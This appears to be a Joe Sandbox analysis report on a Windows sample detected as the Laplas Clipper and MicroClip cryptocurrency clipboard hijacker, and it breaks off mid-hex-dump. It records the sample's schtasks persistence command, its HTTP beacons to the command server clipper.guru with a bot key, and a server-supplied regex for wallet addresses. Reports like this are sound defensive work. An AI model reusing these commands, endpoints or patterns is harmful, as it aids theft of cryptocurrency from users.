Edit tour

Windows Analysis Report
IVO2cpEukR.exe

Overview

General Information

Sample Name:	IVO2cpEukR.exe
Analysis ID:	736208
MD5:	6738634d9b3bfcf7ebca8be48c091b3e
SHA1:	f08091a4b3f5c167bcdfa565584bed8ed2a69f0c
SHA256:	8c77759eff69330a5c9697d05e2a0f99c6edff904bdd52a048df0461d0459b27
Tags:	exeLaplasClipper
Infos:

Detection

Laplas Clipper, MicroClip

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected MicroClip

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Yara detected Laplas Clipper

Uses schtasks.exe or at.exe to add and modify task schedules

Drops PE files

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

IVO2cpEukR.exe (PID: 4544 cmdline: C:\Users\user\Desktop\IVO2cpEukR.exe MD5: 6738634D9B3BFCF7EBCA8BE48C091B3E)

cmd.exe (PID: 5268 cmdline: cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 4256 cmdline: schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

svcupdater.exe (PID: 6084 cmdline: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe MD5: 6738634D9B3BFCF7EBCA8BE48C091B3E)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: IVO2cpEukR.exe PID: 4544	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Process Memory Space: svcupdater.exe PID: 6084	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Process Memory Space: svcupdater.exe PID: 6084	JoeSecurity_MicroClip	Yara detected MicroClip	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: IVO2cpEukR.exe

ReversingLabs: Detection: 14%

Antivirus detection for URL or domain

Source: http://clipper.guru/bot/online?guid=computer	Avira URL Cloud: Label: phishing
Source: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe

ReversingLabs: Detection: 14%

Source: IVO2cpEukR.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Joe Sandbox View

IP Address: 45.159.189.115 45.159.189.115

Source: svcupdater.exe, 00000004.00000002.522718471.000000C000186000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clipper.guru/bot/online?guid=computer
Source: svcupdater.exe, 00000004.00000002.522749478.000000C000192000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef

Source: unknown

DNS traffic detected: queries for: clipper.guru

Source: global traffic	HTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: IVO2cpEukR.exe

ReversingLabs: Detection: 14%

Source: C:\Users\user\Desktop\IVO2cpEukR.exe

File read: C:\Users\user\Desktop\IVO2cpEukR.exe

Jump to behavior

Source: IVO2cpEukR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\IVO2cpEukR.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IVO2cpEukR.exe C:\Users\user\Desktop\IVO2cpEukR.exe
Source: C:\Users\user\Desktop\IVO2cpEukR.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
Source: C:\Users\user\Desktop\IVO2cpEukR.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01

Source: C:\Users\user\Desktop\IVO2cpEukR.exe

File created: C:\Users\user\AppData\Roaming\ipXroBUdMG

Jump to behavior

Source: classification engine

Classification label: mal84.troj.spyw.winEXE@7/3@3/1

Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: IVO2cpEukR.exe

Static file information: File size 5021696 > 1048576

Source: IVO2cpEukR.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: IVO2cpEukR.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x269800
Source: IVO2cpEukR.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x208e00

Source: IVO2cpEukR.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: IVO2cpEukR.exe	Static PE information: section name: .symtab
Source: svcupdater.exe.0.dr	Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\IVO2cpEukR.exe

File created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"

Source: C:\Users\user\Desktop\IVO2cpEukR.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IVO2cpEukR.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: svcupdater.exe, 00000004.00000002.522992248.0000023E77048000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: IVO2cpEukR.exe, 00000000.00000002.258406632.0000028D55C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX

Source: C:\Users\user\Desktop\IVO2cpEukR.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"			Jump to behavior

Stealing of Sensitive Information

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR

Yara detected Laplas Clipper

Source: Yara match	File source: Process Memory Space: IVO2cpEukR.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR

Remote Access Functionality

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	2 Non-Application Layer Protocol	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	11 Process Injection	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IVO2cpEukR.exe	15%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe	15%	ReversingLabs

URLs

Source	Detection	Scanner	Label	Link
http://clipper.guru/bot/online?guid=computer	100%	Avira URL Cloud	phishing
http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
clipper.guru	45.159.189.115	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://clipper.guru/bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef	false		unknown
http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://clipper.guru/bot/online?guid=computer	svcupdater.exe, 00000004.00000002.522718471.000000C000186000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.159.189.115	clipper.guru	Netherlands		14576	HOSTING-SOLUTIONSUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	736208
Start date and time:	2022-11-02 18:28:46 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	IVO2cpEukR.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.spyw.winEXE@7/3@3/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 96.9% (good quality ratio 90.6%) Quality average: 59.3% Quality standard deviation: 33.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Execution Graph export aborted for target IVO2cpEukR.exe, PID 4544 because there are no executed function
Execution Graph export aborted for target svcupdater.exe, PID 6084 because there are no executed function
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: IVO2cpEukR.exe

Simulations

Behavior and APIs

Time	Type	Description
18:29:48	Task Scheduler	Run new task: ipXroBUdMG path: "C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe"

Created / dropped Files

C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe

Download File

Process:	C:\Users\user\Desktop\IVO2cpEukR.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5021696
Entropy (8bit):	5.993018394677145
Encrypted:	false
SSDEEP:	49152:cAMzHHGxBRJHrcFFmJAhaShRgxuMY8qa9vjTIt0IEqYjla27/BS5g+A:bMjGxBQFFmJA3Foq+vOEdZZ+A
MD5:	6738634D9B3BFCF7EBCA8BE48C091B3E
SHA1:	F08091A4B3F5C167BCDFA565584BED8ED2A69F0C
SHA-256:	8C77759EFF69330A5C9697D05E2A0F99C6EDFF904BDD52A048DF0461D0459B27
SHA-512:	C8E6F3DD4C7DE4C9A54278A398D096AABF8391A8A92484EB2A8E74D6D288D8B066E967916645E2AAEC53FB4C8C3AC9F1CBD0FC01C1B828A1A742AF3BC57AAAF5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 15%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........L.......".......&...................@..............................`P...........`... ...............................................N...............................N..f.................................................. @G.H............................text.....&.......&.................`..`.rdata... ...&... ...&.............@..@.data........@G......,G.............@....idata........N......0K.............@....reloc...f....N..h...6K.............@..B.symtab......PP.......L................B................................................................................................................................................................................................................................................................................................................................................................................

\Device\Mup\computer\PIPE\samr

Download File

Process:	C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.438743916256937
Encrypted:	false
SSDEEP:	3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
MD5:	E467C82627F5E1524FDB4415AF19FC73
SHA1:	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
SHA-256:	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
SHA-512:	2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

\Device\Null

Download File

Process:	C:\Windows\System32\schtasks.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	4.67858562893781
Encrypted:	false
SSDEEP:	3:BgnKDOhoeK0oiH0CWKAK89AAAXb:BgnKqhxKRkd2K89o
MD5:	ABC2D94AE97A29E1FF28221D1192EA39
SHA1:	EBD96AF6D655A50FC9655FFCEEE1CAA90629BA6F
SHA-256:	AF912F9EB0344ECA3E7083E7E999E60C6430BFF221ABC04FDD51662660A12CB5
SHA-512:	F80813E55B163DCC3F6677BA92A9CB3CCB245DFAA682366A9C528B2F49B87EB78944E25717B24CA9023D9DF957147121AD68476CC7BF4ED4851EC283AB6ABA79
Malicious:	false
Preview:	SUCCESS: The scheduled task "\ipXroBUdMG" has successfully been created...

WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, QueryFullProcessImageNameA, ProcessIdToSessionId, PostQueuedCompletionStatus, OpenProcess, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2022 18:29:50.770592928 CET	49708	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:29:50.800642967 CET	80	49708	45.159.189.115	192.168.2.6
Nov 2, 2022 18:29:50.800806999 CET	49708	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:29:50.821186066 CET	49708	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:29:50.851111889 CET	80	49708	45.159.189.115	192.168.2.6
Nov 2, 2022 18:29:50.851912975 CET	80	49708	45.159.189.115	192.168.2.6
Nov 2, 2022 18:29:50.852407932 CET	49708	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:29:50.884027958 CET	80	49708	45.159.189.115	192.168.2.6
Nov 2, 2022 18:29:50.924983978 CET	49708	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:30:20.881997108 CET	80	49708	45.159.189.115	192.168.2.6
Nov 2, 2022 18:30:20.882083893 CET	49708	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:30:20.882555008 CET	49708	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:30:20.912445068 CET	80	49708	45.159.189.115	192.168.2.6
Nov 2, 2022 18:30:50.983144045 CET	49709	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:30:51.012626886 CET	80	49709	45.159.189.115	192.168.2.6
Nov 2, 2022 18:30:51.014977932 CET	49709	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:30:51.016272068 CET	49709	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:30:51.045741081 CET	80	49709	45.159.189.115	192.168.2.6
Nov 2, 2022 18:30:51.046528101 CET	80	49709	45.159.189.115	192.168.2.6
Nov 2, 2022 18:30:51.046916962 CET	49709	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:30:51.077117920 CET	80	49709	45.159.189.115	192.168.2.6
Nov 2, 2022 18:30:51.118437052 CET	49709	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:31:21.076092005 CET	80	49709	45.159.189.115	192.168.2.6
Nov 2, 2022 18:31:21.076174021 CET	49709	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:31:21.083151102 CET	49709	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:31:21.112533092 CET	80	49709	45.159.189.115	192.168.2.6
Nov 2, 2022 18:31:51.933299065 CET	49710	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:31:51.962971926 CET	80	49710	45.159.189.115	192.168.2.6
Nov 2, 2022 18:31:51.963299036 CET	49710	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:31:51.963864088 CET	49710	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:31:51.994096041 CET	80	49710	45.159.189.115	192.168.2.6
Nov 2, 2022 18:31:51.995026112 CET	80	49710	45.159.189.115	192.168.2.6
Nov 2, 2022 18:31:51.995821953 CET	49710	80	192.168.2.6	45.159.189.115
Nov 2, 2022 18:31:52.027110100 CET	80	49710	45.159.189.115	192.168.2.6
Nov 2, 2022 18:31:52.068528891 CET	49710	80	192.168.2.6	45.159.189.115

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2022 18:29:50.733129025 CET	49448	53	192.168.2.6	8.8.8.8
Nov 2, 2022 18:29:50.750500917 CET	53	49448	8.8.8.8	192.168.2.6
Nov 2, 2022 18:30:50.961983919 CET	59082	53	192.168.2.6	8.8.8.8
Nov 2, 2022 18:30:50.981436014 CET	53	59082	8.8.8.8	192.168.2.6
Nov 2, 2022 18:31:51.913724899 CET	59504	53	192.168.2.6	8.8.8.8
Nov 2, 2022 18:31:51.932436943 CET	53	59504	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 2, 2022 18:29:50.733129025 CET	192.168.2.6	8.8.8.8	0x315d	Standard query (0)	clipper.guru	A (IP address)	IN (0x0001)	false
Nov 2, 2022 18:30:50.961983919 CET	192.168.2.6	8.8.8.8	0xeef8	Standard query (0)	clipper.guru	A (IP address)	IN (0x0001)	false
Nov 2, 2022 18:31:51.913724899 CET	192.168.2.6	8.8.8.8	0x97c2	Standard query (0)	clipper.guru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 2, 2022 18:29:50.750500917 CET	8.8.8.8	192.168.2.6	0x315d	No error (0)	clipper.guru	45.159.189.115	A (IP address)	IN (0x0001)	false
Nov 2, 2022 18:30:50.981436014 CET	8.8.8.8	192.168.2.6	0xeef8	No error (0)	clipper.guru	45.159.189.115	A (IP address)	IN (0x0001)	false
Nov 2, 2022 18:31:51.932436943 CET	8.8.8.8	192.168.2.6	0x97c2	No error (0)	clipper.guru	45.159.189.115	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

clipper.guru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49708	45.159.189.115	80	C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe

Timestamp	kBytes transferred	Direction	Data
Nov 2, 2022 18:29:50.821186066 CET	97	OUT	GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 2, 2022 18:29:50.851912975 CET	98	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 02 Nov 2022 17:29:50 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: keep-alive Data Raw: 6f 6b Data Ascii: ok
Nov 2, 2022 18:29:50.852407932 CET	98	OUT	GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 2, 2022 18:29:50.884027958 CET	99	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 02 Nov 2022 17:29:50 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 803 Connection: keep-alive Data Raw: 5e 28 3f 3a 28 31 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 33 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 62 63 31 71 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 34 2c 35 39 7d 29 7c 28 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 71 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 70 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 4c 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 4d 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 6c 74 63 31 71 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 30 78 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 44 7b 31 7d 5b 35 2d 39 41 2d 48 4a 2d 4e 50 2d 55 5d 7b 31 7d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 7d 29 7c 28 34 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 38 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 72 5b 30 2d 39 61 2d 7a 41 2d 5a 5d 7b 32 34 2c 33 34 7d 29 7c 28 74 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 33 33 7d 29 7c 28 58 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 72 6f 6e 69 6e 3a 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 54 5b 41 2d 5a 61 2d 7a 31 2d 39 5d 7b 33 33 7d 29 7c 28 68 74 74 70 5b 73 5d 2a 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 74 72 61 